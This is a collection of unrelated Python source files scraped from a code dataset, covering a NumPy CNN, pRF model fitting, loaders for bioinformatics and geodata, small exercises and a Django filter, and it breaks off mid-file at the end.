把output想象成一个二维数组,每一个元素是维度为self.num_filters的向量。\n output = np.zeros((h-2, w-2, self.num_filters)) #26*26*8,因为过滤器是8*3*3\n\n # im_region一个包含相关图像区域的3x3阵列\n # self.filter 一个3d数组 8*3*3\n # im_region * self.filters 使用广播功能\n for im_region, i, j in self.iterate_regions(input):\n # self.filters is a 3d array with 8 x 3 x 3\n # im_region multi every 3x3 array in self.filters\n output[i, j] = np.sum(im_region * self.filters, axis=(1, 2))\n\n return output\n'''\n图像中相邻的像素倾向具有相似的值。\n池化层,减少通过猜测在输入中产生的汇总值。简单的max或average等这些操作。\n在开始的conv layer 之后放置一个池大小为2的max pooling 把 26*26*8 变成 13*13*8\n'''\n\n\nclass MaxPool2:\n # A max pooling layer using a pool size of 2\n def iterate_region(self, image: np.ndarray):\n '''\n Generate non-ovrlapping 2x2 image regions to pool over\n image is a 3d numpy array\n :param image:\n :return:\n '''\n h, w, _ = image.shape\n new_h, new_w = 
h // 2, w // 2\n\n for i in range(new_h):\n for j in range(new_w):\n image_region = image[(i*2):(i*2+2), (j*2):(j*2+2)]\n yield image_region, i, j\n\n def forward(self, input: np.ndarray):\n '''\n :param input: a 3d array with dimensions (h, w, num_filters)\n :return: a 3d array with dimensions (h/2, w/2, num_filters)\n '''\n h, w, num_filters = input.shape # 来自卷积层的输出26*26*8\n output = np.zeros((h//2, w//2, num_filters))\n\n for image_region, i, j in self.iterate_region(input):\n output[i, j] = np.max(image_region, axis=(0, 1))\n\n return output\n\n\nclass Softmax:\n '''\n 将任意实际值转换为概率,\n 13*13*8 --> (0, 9)\n 帮我们量化对预测的确定程度\n '''\n # A standard fully-connected layer with softmax activation\n def __init__(self, input_len, nodes):\n self.weights = np.random.randn(input_len, nodes) / input_len\n self.biases = np.zeros(nodes)\n\n def forward(self, input: np.ndarray):\n '''\n\n :param input: any array with any dimensions\n :return: a 1d numpy array containing the respective probability values\n '''\n input = input.flatten()\n\n input_len, nodes = self.weights.shape\n\n totals = np.dot(input, self.weights) + self.biases\n exp = np.exp(totals)\n return exp / np.sum(exp, axis=0)\n\n\ntrain_images = mnist.train_images()\ntrain_labels = mnist.train_labels()\ntest_images = mnist.test_images()[:1000]\ntest_labels = mnist.test_labels()[:1000]\n\nprint(test_images[0].shape)\n\nconv = Conv3x3(8) # 28*28*1 -> 26*26*8\npool = MaxPool2() # 26*26*8 -> 13*13*8\nsoftmax = Softmax(13 * 13 * 8, 10) # 13*13*8 -> 10\n\n'''\noutput = conv.forward(train_images[0])\nprint(output.shape)\noutput = pool.forward(output)\nprint(output.shape)\n'''\n\n\ndef forward(image: np.ndarray, label):\n # we transform the image from [0, 255] to [-0.5, 0.5] to make it easier\n # to work with, this is standard practice\n out = conv.forward((image / 255) - 0.5)\n out = pool.forward(out)\n out = softmax.forward(out)\n\n # Calculate cross-entropy loss and accuracy\n loss = np.log(out[label])\n acc = 1 if 
np.argmax(out) == label else 0\n\n return out, loss, acc\n\n\nprint('MNIST CNN initialized')\n\n\nloss, num_correct = 0, 0\nfor i, (im, label) in enumerate(zip(test_images, test_labels)):\n _, l, acc = forward(im, label)\n loss += 1\n num_correct += acc\n\n if i % 100 == 99:\n print(\n '[Step %d] Past 100 steps: Average Loss %.3f | Accuracy: %d%%' %\n (i + 1, loss / 100, num_correct)\n )\n loss = 0\n num_correct = 0\n","sub_path":"DL/NeuralNetwork/ConvNeuralNetwork.py","file_name":"ConvNeuralNetwork.py","file_ext":"py","file_size_in_byte":5398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"613636815","text":"import sys\nimport math\nimport collections\n\n\nlast = 100\n\n\ndef main(k=2):\n distribution = collections.defaultdict(int)\n\n for i in range(1, last + 1):\n power_of_k = k**i\n first_digit = get_first_digit(power_of_k)\n distribution[first_digit] += 1\n \n print(\"{0:3}th power of {1} is: {2}, first digit is: {3}\".format(\n i,\n k,\n power_of_k,\n first_digit))\n\n print(end=\"\\n\\n\")\n\n show_distribution(distribution)\n\n\ndef get_first_digit(x):\n while x >= 10:\n x //= 10\n return x\n\n\ndef show_distribution(distribution):\n for i in range(1, 10):\n print(\"Digit {0} has frequency of {1}.\".format(\n i, distribution[i]))\n\n\nmain() if len(sys.argv) <= 1 else main(int(sys.argv[1]))","sub_path":"powersof2.py","file_name":"powersof2.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"47249298","text":"##### Run this like: #####\n##### python plotHistogram.py #######\n\nimport os, sys, re, time, getopt, glob, array\nfrom copy import copy, deepcopy\nfrom ROOT import *\nsys.path.insert(0, '/home/arka/arka/include')\nsys.path.insert(0, '/mnt/droplet/home/arka/arka/include')\nfrom Functions import * \n\ndef main():\n directory='plotBeta'\n if not os.path.exists(directory):\n os.makedirs(directory)\n 
rootFileName = sys.argv[1]\n allRootFileList = sys.argv[2]\n fileRoot = TFile(rootFileName, \"UPDATE\")\n \n with open(allRootFileList) as inputRootFileName:\n for line in inputRootFileName.readlines():\n if '.root' not in line: continue\n massValue = line.split('Mass')\n mass = massValue[1].split('.')[0]\n nameOfFile = line.rstrip()\n fileInput = TFile(nameOfFile, 'READ')\n NTDeff = fileInput.Get('NTDeffEz_Beta_eff')\n \n ### Draw 1D histograms\n drawLine = False\n logY = False\n leftLegend = False\n doAtlas = False\n\n file1D = [NTDeff]; legName = ['']; colorPlot = [4]\n actualMass = mass.split('_')[1]\n DrawHists(file1D, legName, colorPlot, '#beta', 'Efficiency', 0.0, 1.0, 0.0, 0.4, directory+'/NTDeffMass'+mass, 0, 0, drawLine, logY, 'Particle mass: '+actualMass+' GeV', 'NTD efficiency', '', leftLegend, doAtlas)\n \n fileRoot.cd()\n NTDeff.Write('NTDeffMass'+mass)\n fileRoot.Write()\n fileInput.Close()\n \n \n fileRoot.Close()\n \n \n\n\nif __name__==\"__main__\":\n main()\n","sub_path":"plotBeta.py","file_name":"plotBeta.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"553843282","text":"A={}\nB={}\nC={}\nl=[]\nseq=[]\nfrom Bio import SeqIO\nfor record in SeqIO.parse('BSRD.fasta', 'fasta'):\n A[record.description]=record.seq \n if len(record.seq) >= 30 and len(record.seq)<=530: # filtering based on length\n l.append(record)\n B[record.description]=record.seq\n else:\n C[record.description]=record.seq\n \n \nwith open('filtered_BSRD.fasta', 'w') as f:\n [f.write('>{0},len={1}\\n{2}\\n'.format(key,len(value),value)) for key,value in B.items()]\n \nwith open('unfiltered_bsrd.txt', 'w') as f:\n [f.write('>{0},len={1}\\n{2}\\n'.format(key,len(value),value)) for key, value in C.items()]\n\noutput_handle = open(\"long_seqs.fasta\", \"w\") \nSeqIO.write(l, output_handle, \"fasta\") # SEQIO way of writing an output file\n\n\n#### This code is for filtering the fasta file 
based on the length. #######\n","sub_path":"Fasta_length_fileter.py","file_name":"Fasta_length_fileter.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"259381934","text":"from math import ceil\r\n\r\nclass PrimeIterator:\r\n def __init__(self, high):\r\n self.high = high\r\n self.number = 1\r\n\r\n def __iter__(self):\r\n return self\r\n\r\n def is_prime(self, number):\r\n if number == 2 or number == 3:\r\n return True\r\n for n in range(2, ceil(number * 0.5)):\r\n if number % n == 0:\r\n return False\r\n return True\r\n\r\n def __next__(self):\r\n while self.number < self.high:\r\n self.number += 1\r\n if self.is_prime(self.number):\r\n return self.number\r\n raise StopIteration\r\n\r\n\r\nhigh = int(input('Input the upper bound:\\n>'))\r\niterator = PrimeIterator(high)\r\nprint(*[i for i in iterator])\r\n","sub_path":"iter_prime.py","file_name":"iter_prime.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"296977029","text":"# Exercise 07\n\nimport math\n\nnum = int(input(\"Type a new number: \"))\n\ndouble = num * 2\ntriple = num * 3\nsquare = math.sqrt(num)\n\nprint(f\"The number {num} double is {double}, it's triple is {triple}, and it's square root is {square}\")","sub_path":"ex_007.py","file_name":"ex_007.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"547891405","text":"from popeye.visual_stimulus import VisualStimulus\nfrom popeye import og, dog\nimport popeye.utilities as utils\nimport numpy as np\nimport os.path as op\nfrom scipy import signal\nimport ctypes\nfrom popeye.visual_stimulus import VisualStimulus, simulate_bar_stimulus\n\nderivatives = '/data/odc/derivatives'\n\nv = np.load('/data/odc/zooi/tr_prf.npy')\ndata = np.mean(v, 0)\ndata = data[:, (data != 
0).all(0)]\n\ndm = np.load(op.join(derivatives, 'prf/dm.npy'))\ndm = signal.resample(dm, 318, axis=-1)\n\nviewing_distance=15\nscreen_width=6\nTR=2.7\nn_pixels=50\n\nsweeps = np.array([-1,45,135,-1,225,315,-1]) # in degrees, -1 is blank\n#stimulus = VisualStimulus(stim_arr=dm,\n #viewing_distance=viewing_distance,\n #screen_width=screen_width,\n #scale_factor=1,\n #tr_length=1.0,\n #dtype=np.short)\nbar = simulate_bar_stimulus(100, 100, 40, 40, sweeps, 30, 30, 20, 0.67)\nstimulus = VisualStimulus(bar, 50, 25, 0.50, 1.0, ctypes.c_int16)\n\nmodel= og.GaussianModel(stimulus, utils.double_gamma_hrf)\nmodel.hrf_delay = 0\n\npars = dict(np.load('/data/odc/derivatives/voxel_prf/modelfree/sub-tr_desc-None_prf_pars.npz'))\n\nx = np.cos(pars['angle']) * pars['ecc']\ny = np.cos(pars['angle']) * pars['ecc']\n\n\n### FIT\n## define search grids\n# these define min and max of the edge of the initial brute-force search. \nx_grid = (-10,10)\ny_grid = (-10,10)\ns_grid = (1/stimulus.ppd + 0.25,5.25)\nh_grid = (-1.0,1.0)\n\n## define search bounds\n# these define the boundaries of the final gradient-descent search.\nx_bound = (-12.0,12.0)\ny_bound = (-12.0,12.0)\ns_bound = (1/stimulus.ppd, 12.0) # smallest sigma is a pixel\nb_bound = (1e-8,None)\nu_bound = (None,None)\nh_bound = (-3.0,3.0)\n\n \n## package the grids and bounds\ngrids = (x_grid, y_grid, s_grid)\nbounds = (x_bound, y_bound, s_bound, h_bound, b_bound, u_bound,)\n# fit\n#fit = dog.DifferenceOfGaussiansFit(model, data, grids, bounds, Ns=5,\n #voxel_index=(1,2,3), auto_fit=True, verbose=1) \n# fit\nfit = og.GaussianFit(model, data[:, 0], grids, bounds, Ns=4,\n voxel_index=(1,2,3), auto_fit=True, verbose=0)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nimport ctypes, multiprocessing\nimport numpy as np\nimport sharedmem\nimport popeye.og_hrf as og\nimport popeye.utilities as utils\nfrom popeye.visual_stimulus import VisualStimulus, simulate_bar_stimulus\n\n# seed random number generator so we get the same answers 
...\nnp.random.seed(2764932)\n\n### STIMULUS\n## create sweeping bar stimulus\nsweeps = np.array([-1,0,90,180,270,-1]) # in degrees, -1 is blank\nbar = simulate_bar_stimulus(100, 100, 40, 20, sweeps, 30, 30, 10)\n\n## create an instance of the Stimulus class\nstimulus = VisualStimulus(bar, 50, 25, 0.50, 1.0, ctypes.c_int16)\n\n### MODEL\n## initialize the gaussian model\nmodel = og.GaussianModel(stimulus, utils.double_gamma_hrf)\n\n## generate a random pRF estimate\nx = -5.24\ny = 2.58\nsigma = 1.24\nhrf_delay = -0.25\nbeta = 0.55\nbaseline = -0.88\n\n## create the time-series for the invented pRF estimate\ndata = model.generate_prediction(x, y, sigma, hrf_delay, beta, baseline)\n\n## add in some noise\ndata += np.random.uniform(-data.max()/10,data.max()/10,len(data))\n\n### FIT\n## define search grids\n# these define min and max of the edge of the initial brute-force search. \nx_grid = (-10,10)\ny_grid = (-10,10)\ns_grid = (1/stimulus.ppd + 0.25,5.25)\nh_grid = (-1.0,1.0)\n\n## define search bounds\n# these define the boundaries of the final gradient-descent search.\nx_bound = (-12.0,12.0)\ny_bound = (-12.0,12.0)\ns_bound = (1/stimulus.ppd, 12.0) # smallest sigma is a pixel\nb_bound = (1e-8,None)\nu_bound = (None,None)\nh_bound = (-3.0,3.0)\n\n## package the grids and bounds\ngrids = (x_grid, y_grid, s_grid, h_grid)\nbounds = (x_bound, y_bound, s_bound, h_bound, b_bound, u_bound,)\n\n## fit the response\n# auto_fit = True fits the model on assignment\n# verbose = 0 is silent\n# verbose = 1 is a single print\n# verbose = 2 is very verbose\nfit = og.GaussianFit(model, data, grids, bounds, Ns=3,\n voxel_index=(1,2,3), auto_fit=True,verbose=1)\n\n## plot the results\nimport matplotlib.pyplot as 
plt\nplt.plot(fit.prediction,c='r',lw=3,label='model',zorder=1)\nplt.scatter(range(len(fit.data)),fit.data,s=30,c='k',label='data',zorder=2)\nplt.xticks(fontsize=16)\nplt.yticks(fontsize=16)\nplt.xlabel('Time',fontsize=18)\nplt.ylabel('Amplitude',fontsize=18)\nplt.xlim(0,len(fit.data))\nplt.legend(loc=0)\n\n## multiprocess 3 voxels\ndata = [data,data,data]\nindices = ([1,2,3],[4,6,5],[7,8,9])\nbundle = utils.multiprocess_bundle(og.GaussianFit, model, data, \n grids, bounds, indices, \n auto_fit=True, verbose=1, Ns=3)\n","sub_path":"analysis/prf/optimize_prfs.py","file_name":"optimize_prfs.py","file_ext":"py","file_size_in_byte":4690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"516451654","text":"#from tensorflow import keras\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D, ZeroPadding2D\nfrom tensorflow.keras.layers import Dense, Activation, Dropout, Flatten\nfrom tensorflow.keras import optimizers\nfrom tensorflow.keras.models import Sequential\n\nimg_width = 150\nimg_height = 150\n\n\n\ndef load_model(MODEL_2):\n\tmodel =Sequential()\n\n\tmodel.add(Conv2D(32,(3,3), input_shape=(img_width, img_height, 3)))\n\tmodel.add(Activation('relu'))\n\tmodel.add(MaxPooling2D(pool_size=(2,2)))\n\n\tmodel.add(Conv2D(32,(3,3), input_shape=(img_width, img_height, 3)))\n\tmodel.add(Activation('relu'))\n\tmodel.add(MaxPooling2D(pool_size=(2,2)))\n\n\tmodel.add(Conv2D(64,(3,3), input_shape=(img_width, img_height, 3)))\n\tmodel.add(Activation('relu'))\n\tmodel.add(MaxPooling2D(pool_size=(2,2)))\n\n\tmodel.add(Flatten())\n\tmodel.add(Dense(64))\n\tmodel.add(Activation('relu'))\n\tmodel.add(Dropout(0.5))\n\tmodel.add(Dense(1))\n\tmodel.add(Activation('sigmoid'))\n\tmodel.load_weights(MODEL_2)\n\treturn model\n\n","sub_path":"predict/img_model.py","file_name":"img_model.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} 
+{"seq_id":"382277269","text":"# import nessary\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\nimport glob\nimport os\nimport math\nfrom tqdm import tqdm\n\n\n__author__ = 'cristian'\n\n\ndef preprocess_image(image):\n image = tf.image.decode_jpeg(image, channels=3)\n image = tf.image.resize_images(image, [160, 160])\n image /= 255.0 # normalize to [0, 1] range\n\n return image\n\n\ndef load_and_preprocess_image(path_to_image):\n image = tf.read_file(path_to_image)\n\n return preprocess_image(image)\n\n\ndef get_employee(path_employee):\n \"\"\"\n return dict{id: name}\n \"\"\"\n data_frame = pd.read_excel(path_employee)\n rows, columns = data_frame.shape\n # data_frame contains two columns: x_emp_code, name\n # get data by row correspond employee code and name\n dict_code_name = {data_frame.iloc[i]['x_emp_code']: data_frame.iloc[i]['name'] for i in range(rows)}\n\n return dict_code_name\n\n\ndef get_employee_code(path_to_dataset, path_employee):\n \"\"\"\n\n \"\"\"\n all_classes = os.listdir(path_to_dataset)\n employee_code = {each_class.split('_')[-1]: '_'.join(each_class.split('_')[:-1]) \\\n for each_class in all_classes}\n print(employee_code)\n # check employee code incorrect\n ds_employee = get_employee(path_employee)\n # count percent checking\n for employee in tqdm(employee_code):\n if employee in ds_employee:\n continue\n else:\n print(\"Occurs when check employee: {}-{}\".format(employee, employee_code[employee]))\n return employee_code\n\n\ndef get_dataset(path_ds, ratio):\n \"\"\"\n return: train_set path, test_set path, number of classes, number of images\n \"\"\"\n\n all_path = glob.glob(os.path.join(path_ds, '*/*'))\n employees = os.listdir(os.path.join(path_ds))\n number_classes = len(employees)\n number_images = len(all_path)\n np.random.shuffle(all_path)\n split = int(math.floor(number_images*(1-ratio)))\n train_set = all_path[:split]\n test_set = all_path[split:]\n\n return train_set, test_set, number_classes, 
number_images\n\n\ndef data_loader():\n pass\n\nif __name__ == '__main__':\n train_set, test_set, number_classes, number_images = get_dataset('datasets', 0.2)\n print(number_classes)\n print(number_images)\n print(len(train_set))\n print(len(test_set))\n _ = get_employee_code('datasets', 'employee/employee.xlsx')\n","sub_path":"data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"518525964","text":"# %%\nimport os\nimport tridy\nfrom tridy import GeoConcept, SubGeoConcept, MetaData, Table, View, DBStorage, DataSource, Feature, FeatureWithID, AdmUnitFeature, OLUFeature, Grid, Imagee, ds_from_metadata, xml_lpis_cz_reader, lpis_cz__posledni_aktualizace, get_listvalues_from_generator, apply_function, select_nodes_from_graph, unzip_file, find_neighbors_till, connection_parameters_to_pg, transform_name_to_postgresql_format, world_to_pixel \nfrom importlib import reload\nimport requests\nimport datetime\nimport re\nfrom io import BytesIO\n\nfrom requests.adapters import HTTPAdapter\nfrom requests.packages.urllib3.util.retry import Retry\n\nfrom osgeo import ogr, osr, gdal\nimport networkx as nx\nimport numpy as np\nimport json\nimport binascii\nimport copy\nimport time\n\nfrom lxml import etree\n\nfrom ipyleaflet import Map, GeoJSON\n\n# %%\ndel(GeoConcept, SubGeoConcept, MetaData, Table, View, DBStorage, DataSource, Feature, FeatureWithID, AdmUnitFeature, OLUFeature, Grid, Imagee, ds_from_metadata,xml_lpis_cz_reader,get_listvalues_from_generator,apply_function,select_nodes_from_graph,world_to_pixel)\nreload(tridy)\nfrom tridy import GeoConcept, SubGeoConcept, MetaData, Table, View, DBStorage, DataSource, Feature, FeatureWithID, AdmUnitFeature, OLUFeature, Grid, Imagee, ds_from_metadata, xml_lpis_cz_reader, get_listvalues_from_generator, apply_function, select_nodes_from_graph,world_to_pixel\n\n# %%\ndef 
compilable_tree_dictionary(object): \n g_dict=\\\n {'admunit':{'object':object},\\\n 'admunit__tree':{'object':'admunit','function':'return_graph_representation'},\\\n 'admunit__tree__reverse':{'object':'admunit__tree','function':'reverse'},\\\n 'admunit__tree__level3':{'function':select_nodes_from_graph,'parameters':['admunit__tree','level',3]},\\\n 'admunit__tree__level4':{'function':select_nodes_from_graph,'parameters':['admunit__tree','level',4]}}\n return g_dict\n\n# %%\ndef find_neighbors_level(graph,start_node,level):\n if graph.nodes()[start_node]['level']==level:\n yield start_node\n else:\n for n in graph.neighbors(start_node):\n yield from find_neighbors_level(graph,n,level) \n\n# %%\ndef get_ruian_au_feature_geometry_from_wfs(gml_id):\n url='https://services.cuzk.cz/wfs/inspire-au-wfs.asp?service=WFS&request=GetFeature&typeName=au:AdministrativeUnit&maxFeatures=1&featureID=%s&version=2.0.0' %gml_id\n r=requests.get(url,stream=False)\n if r.status_code==200:\n tree=etree.parse(BytesIO(r.content))\n root=tree.getroot()\n geom=root.find('.//{http://www.opengis.net/gml/3.2}MultiSurface')\n geom_ogr=ogr.CreateGeometryFromGML(etree.tostring(geom).decode())\n return geom_ogr.ExportToWkt()\n else:\n return 'WFS no works'\n\n# %%\n#for the case when data has to be downloaded externally initialization of requests session variable with setting of number of retries\ns = requests.Session()\nretries = Retry(total=5, backoff_factor=1, status_forcelist=[ 502, 503, 504 ])\ns.mount('http://', HTTPAdapter(max_retries=retries))\n\n# %%\nreplacement_dictionary = {\"[posledni_den_mesice]\":(datetime.datetime.today().replace(day=1)-datetime.timedelta(days=1)).strftime('%Y%m%d'),\"[lpis_cz__posledni_aktualizace]\":lpis_cz__posledni_aktualizace().strftime('%Y%m%d'), \"[vcera]\":(datetime.datetime.today().replace(day=1)-datetime.timedelta(days=1)).strftime('%Y%m%d')} \njson_feature_structure=[{\"name\":\"id\",\"type\":\"serial primary 
key\"},{\"name\":\"geom\",\"type\":\"geometry\"},{\"name\":\"data\",\"type\":\"json\"}]\njson_feature_with_bigid_structure=[{\"name\":\"id\",\"type\":\"bigint primary key\"},{\"name\":\"geom\",\"type\":\"geometry\"},{\"name\":\"data\",\"type\":\"json\"}]\njson_admin_unit_structure=[{\"name\":\"id\",\"type\":\"integer primary key\"},{\"name\":\"geom\",\"type\":\"geometry\"},{\"name\":\"data\",\"type\":\"json\"},{\"name\":\"level\",\"type\":\"integer\"},{\"name\":\"parent_id\",\"type\":\"text\"}]\njson_admin_unit_structure_at=[{\"name\":\"id\",\"type\":\"text primary key\"},{\"name\":\"geom\",\"type\":\"geometry\"},{\"name\":\"data\",\"type\":\"json\"},{\"name\":\"level\",\"type\":\"integer\"},{\"name\":\"parent_id\",\"type\":\"text\"}]\njson_feature_with_raster_structure=[{\"name\":\"id\",\"type\":\"serial primary key\"},{\"name\":\"geom\",\"type\":\"geometry\"},{\"name\":\"data\",\"type\":\"json\"},{\"name\":\"raster_maps\",\"type\":\"raster\"}]\n\n# %%\nadmunit_cz__metadata=MetaData('Administrative units in Czech Republic',\n {\"url\":\"https://vdp.cuzk.cz/vymenny_format/soucasna/[posledni_den_mesice]_ST_UKSG.xml.zip\",\n \"format\":\"GML\", \"compression\":\"zip\"},'data')\n\n# %%\nadmunit_cz__ds=ds_from_metadata(admunit_cz__metadata)\nadmunit_cz=GeoConcept('Administrative units in Czech Republic','Administrative units in Czech Republic. 
All levels.',\n 'AdmUnitFeature',json_admin_unit_structure, data_source=admunit_cz__ds, subgeoconcepts=[] )\n\n# %%\nurl_adresa=admunit_cz.get_data_source().get_attributes()['url']\nfor i in re.findall('\\[.*?\\]',url_adresa):\n if i in list(replacement_dictionary.keys()):\n url_adresa=url_adresa.replace(i,replacement_dictionary[i])\n \nadmunit_cz.get_data_source().set_attribute({'url':url_adresa})\ndel(url_adresa)\n\n# %%\n#admunit_cz.get_data_source().download_data('archive.zip',s,'all',os.getcwd())\nadmunit_cz.get_data_source().set_data_file('20201031_ST_UKSG.xml')\n\n# %%\nconcept_list=['Staty','Vusc','Okresy','Obce','KatastralniUzemi']\nconcept_additional_attributes={'Staty':{'level_value':0,'parent_value':'null','id_attribute':'Kod'},\n 'Vusc':{'level_value':1,'parent_value':'1','id_attribute':'Kod'},\n 'Okresy':{'level_value':2,'parent_attribute':'VuscKod','id_attribute':'Kod'},\n 'Obce':{'level_value':3,'parent_attribute':'OkresKod','id_attribute':'Kod'},\n 'KatastralniUzemi':{'level_value':4,'parent_attribute':'ObecKod','id_attribute':'Kod'}}\n\n# %%\nfor l in list(set(concept_list).intersection(set(admunit_cz.get_data_source().list_layers()))):\n admunit_cz.append_subgeoconcept(SubGeoConcept(l,l,'AdmUnitFeature',admunit_cz.get_attributes(),data_source=DataSource(admunit_cz.get_data_source().get_type(),admunit_cz.get_data_source().get_name(),({**admunit_cz.get_data_source().get_attributes(),**{'layer':l}}),None,admunit_cz.get_data_source().get_data_file()),supergeoconcept=admunit_cz,table_inheritance=False,type='semantic',subgeoconcepts=[]))\n\n# %%\n#administrative territorial units\ndbs_admin_connection={'dbname':'olu_administrative_units','user':'euxdat_admin','host':'euxdat-db-svc','port':'5432','password':'Euxdat12345'}\ndbs_admin=DBStorage(dbs_admin_connection)\ndbs_admin.connect()\ndbs_admin.disconnect()\ndbs_admin.connect()\n\n# %%\nadmunit_cz.create_table(dbs_admin, name='default',scheme='cz',conflict='append')\n\n# %%\nfor sub in 
admunit_cz.get_subgeoconcepts():\n sub.set_table(View(sub.get_name(),sub.get_attributes(), sub.get_supergeoconcept().get_table(),\"level=%s\" % (concept_additional_attributes[sub.get_name()]['level_value']), dbs=dbs_admin, scheme='public', type='usual'))\n dbs_admin.execute(sub.get_table().create_script())\n\n# %%\nwgs84_sr=osr.SpatialReference()\nwgs84_sr.ImportFromProj4('+proj=longlat +datum=WGS84 +no_defs')\n\nsjtsk5514_sr=osr.SpatialReference()\nsjtsk5514_sr.ImportFromProj4('+proj=krovak +lat_0=49.5 +lon_0=24.83333333333333 +alpha=30.28813975277778 +k=0.9999 +x_0=0 +y_0=0 +ellps=bessel +units=m +towgs84=570.8,85.7,462.8,4.998,1.587,5.261,3.56 +no_defs')\n\nsjtsk5514_to_wgs84=osr.CoordinateTransformation(sjtsk5514_sr,wgs84_sr)\n\n# %%\nsub=admunit_cz.get_subgeoconcept_by_name('Okresy')\n\n# %%\nwith open('okresy.geojson', 'w', encoding='utf-8') as file:\n geojson={\"type\": \"FeatureCollection\", \"features\": [] }\n features=sub.read_features_from_table(100)\n for f in features:\n if len(f)>0:\n for feature in f:\n feature.transform_geometry(sjtsk5514_to_wgs84)\n geojson[\"features\"].append(feature.export_to_geojson())\n else:\n break\n json.dump(geojson, file, ensure_ascii=False, indent=4)\n\n# %%\nwith open('okresy.geojson', 'r') as f:\n data = json.load(f)\n \nm = Map(center=(49.5,14.5), zoom=6)\n\ngeo_json = GeoJSON(\n data=data\n)\n \nm.add_layer(geo_json)\n\nm\n\n# %%\n","sub_path":"jupyter_examples/administrative_units_in_czech_republic.py","file_name":"administrative_units_in_czech_republic.py","file_ext":"py","file_size_in_byte":8256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"386046129","text":"def connect(url):\n import re\n import socket\n\n try:\n mysock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n mysock.connect((re.findall('http://(.+?)/',url)[0],80))\n mysock.send(b'GET '+url.encode()+b' HTTP/1.0\\n\\n')\n except:\n return('please enter valid url')\n\n data=bytes()\n while 
True:\n new=mysock.recv(10000)\n if len(new)<1: break\n data=data+new\n mysock.close()\n\n return(data)","sub_path":"socket connect.py","file_name":"socket connect.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"327492453","text":"\n\nimport yaml\nimport logging\n\nlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\nfrom query import QueryExecutor\n\nif __name__ == '__main__':\n config = yaml.safe_load(open('config.yml'))\n models_dir = config['models_dir']\n mongo_connection = config['mongo_connection']\n query_executor = QueryExecutor(mongo_connection, models_dir)\n doc2vec_similar(query_executor)\n\n\nX = model[model.wv.vocab]\npca = PCA(n_components=2)\nresult = pca.fit_transform(X)\n# create a scatter plot of the projection\npyplot.scatter(result[:, 0], result[:, 1])\nwords = list(model.wv.vocab)\nfor i, word in enumerate(words):\n\tpyplot.annotate(word, xy=(result[i, 0], result[i, 1]))\npyplot.show()","sub_path":"src/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"642983703","text":"data = [ord(x) for x in open('input.txt').readline().strip()]\ndata += [17, 31, 73, 47, 23]\nrope = list(range(256))\nposition = 0\nskip = 0\nfor _ in range(64):\n for rope_length in data:\n twisted = []\n for x in range(rope_length):\n twisted.append(rope[(position + x) % 256])\n twisted.reverse()\n for x in range(rope_length):\n rope[(position + x) % 256] = twisted[x]\n position += (rope_length + skip) % 256\n skip += 1\n\ndense_hash = []\nfor x in range(0, 256, 16):\n dense_num = rope[x]\n for y in range(15):\n dense_num = dense_num ^ rope[x + y + 1]\n dense_hash.append(dense_num)\nprint(''.join([format(x, '02x') for x in 
dense_hash]))\n","sub_path":"day10/day10pt2.py","file_name":"day10pt2.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"24249825","text":"# 2. На языке Python 3 разработать 2 программы (модули) для обработки одномерных массивов (векторов),\n# используя списки. Одна программа долж-на работать с целочисленным вектором, а вторая с вещественным вектором.\n\n# 1) Дан целочисленный вектор А(n). Подсчитать сколько раз встречается в этом векторе максимальное по величине число.\n# 2) Дан целочисленный вектор А(n). Найти наибольшее из четных и количество нечетных\n\ndef task1(vector):\n vector.sort()\n print(\"Максимальное значение\", vector[-1], \"встречается\", vector.count(vector[-1]), \"раз\")\n\n\ndef task2(vector):\n odd = []\n even = []\n for i in vector:\n if int(i) % 2 == 0:\n odd.append(int(i))\n else:\n even.append(int(i))\n try:\n max_odd = sorted(odd)[-1]\n except IndexError:\n max_odd = \"нет чётных\"\n print(\"Наибольшее из чётных - \", max_odd, \"Количество нечётных - \", len(even))\n\n\nif __name__ == '__main__':\n task1([32.23, 43.32, 41.43, 43.14, 43, 43.32, 12.43, 33.23, 12, 22])\n task2([32, 1, 4, 23, 13, 44, 12, 44, 21, 12, 44])\n task2([1, 1, 1, 1])\n","sub_path":"lab2_vectors.py","file_name":"lab2_vectors.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"448542342","text":"\nfrom django import template\nfrom django.utils.html import format_html\n\nregister = template.Library()\n\n\n@register.filter()\ndef check_color(elem):\n color = 'white'\n text = '-'\n if elem != '':\n text = float(elem)\n if text < 0:\n color = 'green'\n elif 1 < text < 2:\n color = 